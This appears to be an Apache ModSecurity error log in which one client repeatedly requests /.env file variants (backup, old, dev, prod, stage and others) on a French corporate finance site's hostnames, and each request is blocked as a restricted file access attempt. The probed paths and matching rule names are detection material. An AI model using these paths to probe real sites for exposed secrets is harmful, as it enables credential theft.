[Mon May 11 16:25:12.319200 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:48144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup"] [unique_id "agHmyEWKUxpmnkK7zHx7cwAAAQA"]
[Mon May 11 16:25:12.319443 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:48144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup"] [unique_id "agHmyEWKUxpmnkK7zHx7cwAAAQA"]
[Mon May 11 16:25:12.319920 2026] [core:error] [pid 1411055:tid 1411057] [client 18.180.54.2:48144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:12.323610 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:48144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup"] [unique_id "agHmyEWKUxpmnkK7zHx7cwAAAQA"]
[Mon May 11 16:25:12.471526 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:48158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.old"] [unique_id "agHmyA-Qm4vhlWBPlMi5gAAAAAc"]
[Mon May 11 16:25:12.471772 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:48158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.old"] [unique_id "agHmyA-Qm4vhlWBPlMi5gAAAAAc"]
[Mon May 11 16:25:12.472260 2026] [core:error] [pid 1411099:tid 1411108] [client 18.180.54.2:48158] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:12.473140 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:48158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.old"] [unique_id "agHmyA-Qm4vhlWBPlMi5gAAAAAc"]
[Mon May 11 16:25:13.025345 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:48162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.save"] [unique_id "agHmyVV4kyjgo4bQBUhTxgAAANQ"]
[Mon May 11 16:25:13.025577 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:48162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.save"] [unique_id "agHmyVV4kyjgo4bQBUhTxgAAANQ"]
[Mon May 11 16:25:13.026145 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:48162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:13.026336 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:48162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.save"] [unique_id "agHmyVV4kyjgo4bQBUhTxgAAANQ"]
[Mon May 11 16:25:13.151003 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:48178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.sample"] [unique_id "agHmyTJnyuKVXoStDha0HwAAAEI"]
[Mon May 11 16:25:13.151252 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:48178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.sample"] [unique_id "agHmyTJnyuKVXoStDha0HwAAAEI"]
[Mon May 11 16:25:13.151730 2026] [core:error] [pid 1412074:tid 1412078] [client 18.180.54.2:48178] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:13.152907 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:48178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.sample"] [unique_id "agHmyTJnyuKVXoStDha0HwAAAEI"]
[Mon May 11 16:25:13.712081 2026] [security2:error] [pid 1411099:tid 1411115] [client 18.180.54.2:48190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.old"] [unique_id "agHmyQ-Qm4vhlWBPlMi5gQAAAA8"]
[Mon May 11 16:25:13.712329 2026] [security2:error] [pid 1411099:tid 1411115] [client 18.180.54.2:48190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.old"] [unique_id "agHmyQ-Qm4vhlWBPlMi5gQAAAA8"]
[Mon May 11 16:25:13.712809 2026] [core:error] [pid 1411099:tid 1411115] [client 18.180.54.2:48190] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:13.715363 2026] [security2:error] [pid 1411099:tid 1411115] [client 18.180.54.2:48190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.old"] [unique_id "agHmyQ-Qm4vhlWBPlMi5gQAAAA8"]
[Mon May 11 16:25:13.871258 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:48196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.example"] [unique_id "agHmyfy_GXSWIKeli0vx1AAAAJA"]
[Mon May 11 16:25:13.871503 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:48196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.example"] [unique_id "agHmyfy_GXSWIKeli0vx1AAAAJA"]
[Mon May 11 16:25:13.872519 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:48196] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:13.872708 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:48196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.example"] [unique_id "agHmyfy_GXSWIKeli0vx1AAAAJA"]
[Mon May 11 16:25:14.434711 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:48200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.sample"] [unique_id "agHmykWKUxpmnkK7zHx7dgAAAQg"]
[Mon May 11 16:25:14.434935 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:48200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.sample"] [unique_id "agHmykWKUxpmnkK7zHx7dgAAAQg"]
[Mon May 11 16:25:14.437574 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:48200] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:14.438045 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:48200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.sample"] [unique_id "agHmykWKUxpmnkK7zHx7dgAAAQg"]
[Mon May 11 16:25:14.571762 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.180.54.2:48214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.dev"] [unique_id "agHmyg-Qm4vhlWBPlMi5ggAAAAE"]
[Mon May 11 16:25:14.571974 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.180.54.2:48214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.dev"] [unique_id "agHmyg-Qm4vhlWBPlMi5ggAAAAE"]
[Mon May 11 16:25:14.572484 2026] [core:error] [pid 1411099:tid 1411102] [client 18.180.54.2:48214] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:14.573428 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.180.54.2:48214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.dev"] [unique_id "agHmyg-Qm4vhlWBPlMi5ggAAAAE"]
[Mon May 11 16:25:15.139301 2026] [security2:error] [pid 1416109:tid 1416134] [client 18.180.54.2:48230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.example"] [unique_id "agHmy1V4kyjgo4bQBUhTywAAAMQ"]
[Mon May 11 16:25:15.139559 2026] [security2:error] [pid 1416109:tid 1416134] [client 18.180.54.2:48230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.example"] [unique_id "agHmy1V4kyjgo4bQBUhTywAAAMQ"]
[Mon May 11 16:25:15.140102 2026] [core:error] [pid 1416109:tid 1416134] [client 18.180.54.2:48230] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:15.140275 2026] [security2:error] [pid 1416109:tid 1416134] [client 18.180.54.2:48230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.example"] [unique_id "agHmy1V4kyjgo4bQBUhTywAAAMQ"]
[Mon May 11 16:25:15.257202 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:48234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.prod"] [unique_id "agHmyzJnyuKVXoStDha0JAAAAFI"]
[Mon May 11 16:25:15.257435 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:48234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.prod"] [unique_id "agHmyzJnyuKVXoStDha0JAAAAFI"]
[Mon May 11 16:25:15.258922 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:48234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:15.259629 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:48234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.prod"] [unique_id "agHmyzJnyuKVXoStDha0JAAAAFI"]
[Mon May 11 16:25:15.864793 2026] [security2:error] [pid 1411201:tid 1411254] [client 18.180.54.2:48238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.dev"] [unique_id "agHmy_y_GXSWIKeli0vx1gAAAIg"]
[Mon May 11 16:25:15.865051 2026] [security2:error] [pid 1411201:tid 1411254] [client 18.180.54.2:48238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.dev"] [unique_id "agHmy_y_GXSWIKeli0vx1gAAAIg"]
[Mon May 11 16:25:15.865952 2026] [core:error] [pid 1411201:tid 1411254] [client 18.180.54.2:48238] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:15.867857 2026] [security2:error] [pid 1411201:tid 1411254] [client 18.180.54.2:48238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.dev"] [unique_id "agHmy_y_GXSWIKeli0vx1gAAAIg"]
[Mon May 11 16:25:15.984223 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:48254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.stage"] [unique_id "agHmyzJnyuKVXoStDha0JQAAAEA"]
[Mon May 11 16:25:15.984444 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:48254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.stage"] [unique_id "agHmyzJnyuKVXoStDha0JQAAAEA"]
[Mon May 11 16:25:15.984917 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:48254] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
